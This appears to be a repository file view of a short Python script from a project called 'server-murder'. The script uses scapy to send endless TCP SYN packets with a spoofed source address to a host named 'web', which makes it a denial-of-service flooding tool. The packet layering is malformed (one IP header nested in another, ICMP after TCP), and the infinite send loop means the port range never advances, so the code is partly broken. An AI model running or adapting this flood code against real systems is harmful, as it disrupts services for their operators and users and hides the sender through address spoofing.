server-murder/client/app.py
2024-12-17 16:10:35 +01:00

5 lines
165 B
Python

from scapy.all import *
for i in range(512,2048):
pkt = IP(dst='web') / IP(src='192.168.1.69')/ TCP(dport=80,sport=i,flags='S') / ICMP()
send(pkt, loop=1)